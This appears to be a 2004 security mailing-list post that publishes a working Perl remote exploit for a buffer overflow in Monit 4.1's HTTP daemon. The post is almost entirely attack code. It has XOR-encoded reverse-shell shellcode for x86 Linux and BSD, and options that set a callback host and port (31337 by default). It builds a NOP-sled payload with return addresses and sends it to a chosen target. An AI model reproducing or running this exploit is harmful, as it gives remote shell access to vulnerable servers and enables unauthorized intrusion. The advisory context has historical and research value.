Here's an oldie for a simple buffer overflow vuln. Read the security advisory for more info: http://www.securityfocus.com/bid/9099/discussion/ If I've been correctly informed, the public exploit out there only DoSes (I haven't tested it, so I really can't say). Anyway, this one's an over-hacked reverse shellcode variant... discard it in any degree you like. // Michel, http://www.cycom.se #!/usr/bin/perl # # Monit 4.1 (possibly earlier too) remote shell exploit (HTTP) # (C) 2004 by Shadowinteger <shadowinteger@xxxxxxxxxxxx> # # Verbatim copying, distribution and/or modification of this # code is permitted without restriction. # # THIS SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY # KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR # PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS # OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR # OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE # SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. # # You may have to install Math::XOR for this to run, e.g.: # $ perl -MCPAN -e "install Math::XOR" # # Acknowledgments: Sabu, Nullbyte # use POSIX; use Getopt::Std; use IO::Socket::INET; use Math::XOR; use strict; sub usage { print "usage: sploit [-a 0xbf7ff9e4] [-o 250] target_host [port]\n" . " -a address ret address to make eip\n" . " -o offset offset to subtract from address before injecting it\n" . " -c hostname choose hostname to have the shellcode connect back to, default\n" . " is localhost\n" . " -p port choose port to have the shellcode connect back to, default is\n" . " 31337.\n" . " -B use x86 *BSD shellcode instead of x86 Linux\n" . "The default address is 0xbf7ff9e4 and the default offset to subtract from that\n" . "address is 250, this works under Slackware 8.1 with default ./configure\n" . "compilation options. You may have to do some research for your system, gdb is\n" . "your friend, e.g. \"gdb process pid_of_monit_httpd\".\n"; exit 1; } # pre_shellcode was added to make sure the stack doesn't write into our # shellcode my $pre_shellcode = "\x83\xC4\x40"; # add esp, byte 0x40 my $linux_shellcode = # shadowinteger's reverse shellcode (sishell, x86 linux) "\xeb\x74\x5d\x6a\x06\x6a\x01\x6a\x02\x8d\x1c\x24\x89\xd9\x31\xdb" . "\xb3\x01\x31\xc0\xb0\x66\xcd\x80\x89\xc7\x83\xec\x08\x31\xc9\xc6" . "\x04\x24\x02\x88\x4c\x24\x01\xb8\x80\xff\xff\xfe\x35\xff\xff\xff" . "\xff\x66\xc7\x44\x24\x02\x7a\x69\x89\x44\x24\x04\x8d\x04\x24\x83" . "\xec\x10\x89\x3c\x24\x89\x44\x24\x04\x31\xc0\xb0\x10\x89\x44\x24" . "\x08\x31\xc0\xb0\x66\x31\xdb\xb3\x03\x8d\x14\x24\x89\xd1\xcd\x80" . "\x85\xc0\x78\x3c\x31\xc9\x31\xc0\xb0\x3f\x89\xfb\xcd\x80\x41\x80" . "\xf9\x02\x77\x04\xeb\xf0\xeb\x2f\x83\xec\x10\x8d\x44\x24\x08\x89" . "\x04\x24\x31\xdb\x89\x5c\x24\x04\x89\x5c\x24\x08\x88\x5d\x07\x89" . "\xeb\x8d\x14\x24\x89\xd1\x31\xd2\x31\xc0\xb0\x0e\x2c\x03\xcd\x80" . "\x31\xc0\x89\xc3\x40\xcd\x80\xe8\x56\xff\xff\xff\x2f\x62\x69\x6e" . "\x2f\x73\x68\x24"; my $lin_IP_OFFSET = 40; my $lin_PORT_OFFSET = 54; my $lin_XOR = 0xffffffff; # number to xor the ip address with my $bsd_shellcode = # shadowinteger's reverse shellcode (sishell, x86 bsd) "\xeb\x55\x5d\x6a\x06\x6a\x01\x6a\x02\x31\xc0\xb0\x61\x50\xcd\x80" . "\x89\xc7\x83\xec\x08\x31\xc9\xc6\x04\x24\x02\x88\x4c\x24\x01\xb8" . "\x80\xff\xff\xfe\x35\xff\xff\xff\xff\x66\xc7\x44\x24\x02\x7a\x69" . "\x89\x44\x24\x04\x8d\x04\x24\x6a\x10\x50\x57\x31\xc0\xb0\x62\x50" . "\xcd\x80\x72\x3b\x31\xc9\x51\x57\x31\xc0\xb0\x5a\x50\xcd\x80\x41" . "\x80\xf9\x02\x77\x04\xeb\xef\xeb\x2e\x83\xec\x10\x8d\x44\x24\x08" . "\x89\x04\x24\x31\xdb\x89\x5c\x24\x04\x89\x5c\x24\x08\x8d\x14\x24" . "\x89\xd1\x53\x51\x88\x5d\x07\x55\x31\xc0\xb0\x3b\x50\xcd\x80\x31" . "\xc0\x50\xfe\xc0\x50\xcd\x80\xe8\x76\xff\xff\xff\x2f\x62\x69\x6e" . "\x2f\x73\x68\x24"; my $bsd_IP_OFFSET = 32; my $bsd_PORT_OFFSET = 46; my $bsd_XOR = 0xffffffff; # just define these here, since we're "strict" my $shellcode; my $IP_OFFSET; my $PORT_OFFSET; my $XOR; # set up defaults my $offset = 250; # offset to back-track (subtract) from $address my $address = 0xbf7ff9e4; my $target = "localhost"; my $port = 2812; my $callback_host = "localhost"; my $callback_port = pack('n', 31337); # handle options my %options = (); getopts("a:o:c:p:Bh", \%options); if ( defined $options{h} ) { usage(); } if ( ! $ARGV[0]) { usage(); } else { if ( length($ARGV[0]) > 0 ) { $target = $ARGV[0]; } } if ( $ARGV[1]) { $port = $ARGV[1]; } # if -B option is present, define $bsd my $bsd = "yes" if defined $options{B}; if ( defined $options{a} ) { $address = hex($options{a}); } if ( defined $options{o} ) { $offset = $options{o}; } if ( defined $options{c} ) { if ( length($options{c}) > 0 ) { $callback_host = $options{c}; } } if ( defined $options{p} ) { $callback_port = pack('n', $options{p}); } # set up shellcode pointers... linux or bsd? if ( defined $bsd ) { $shellcode = $bsd_shellcode; $IP_OFFSET = $bsd_IP_OFFSET; $PORT_OFFSET = $bsd_PORT_OFFSET; $XOR = $bsd_XOR; } else { $shellcode = $linux_shellcode; $IP_OFFSET = $lin_IP_OFFSET; $PORT_OFFSET = $lin_PORT_OFFSET; $XOR = $lin_XOR; } # resolve hostname my $callback_ip = gethostbyname($callback_host); # insert resolved connect back address into shellcode substr($shellcode, $IP_OFFSET, 4, xor_buf($callback_ip, pack('l',$XOR))); # insert port into shellcode (short network order) substr($shellcode, $PORT_OFFSET, 2, $callback_port); # decode (un-xor) IP address in shellcode and print it to stdout # don't uncomment, it's just an example # print xor_buf(substr($shellcode, $IP_OFFSET, 4), pack('l',$XOR)); # calculate address and make it binary my $eip = $address - $offset; my $bin_eip = pack('l', $eip); # cruft is our parsed payload: # [ NOPNOPNOPNOP ] [ PRE ] [ SHELLCODE ] [ ADDR ] [ ADDR ] # ^ # ideal jump address # my $cruft = "\x90" x (256 - length($pre_shellcode . $shellcode)) . $pre_shellcode . $shellcode . $bin_eip x 2; # build HTTP request, there's nothing more to it than to add a double linefeed my $request = $cruft . "\n\n"; # # print banner and get started # print '-»» Monit 4.1 remote shell exploit (HTTP)'."\n"; print '««- (C) 2004 Shadowinteger <shadowinteger@xxxxxxxxxxxx'."\n"; if ( defined $bsd ) { print "[i] using x86 *BSD shellcode (sishell)\n"; } else { print "[i] using x86 Linux shellcode (sishell)\n"; } printf("[i] using ret address: 0x%x\n", $eip); print "[i] shellcode will connect to " . inet_ntoa($callback_ip) . ", port " . unpack('n', $callback_port) . "\n"; print "[i] attacking " . $target . ", port " . $port . "\n"; print "[+] connecting to target...\n"; my $socket = 0; $socket = IO::Socket::INET -> new( PeerAddr => $target, PeerPort => $port, Proto => "tcp" ); if (!defined($socket)) { print "[?] no connection!\n"; exit 1; } print "[i] connection established\n"; print "[+] injecting shellcode...\n"; print $socket $request; sleep(3); print "[i] done\n"; close $socket; exit 0; ## EOF -- Michel Blomgren Cycom AB http://www.cycom.se ______________________________________________ PGP: http://www.cycom.se/misc/pubkeymichel.asc 886A 7B17 1747 6C82 7A7E EAC0 A3F1 2943 101C 18FA
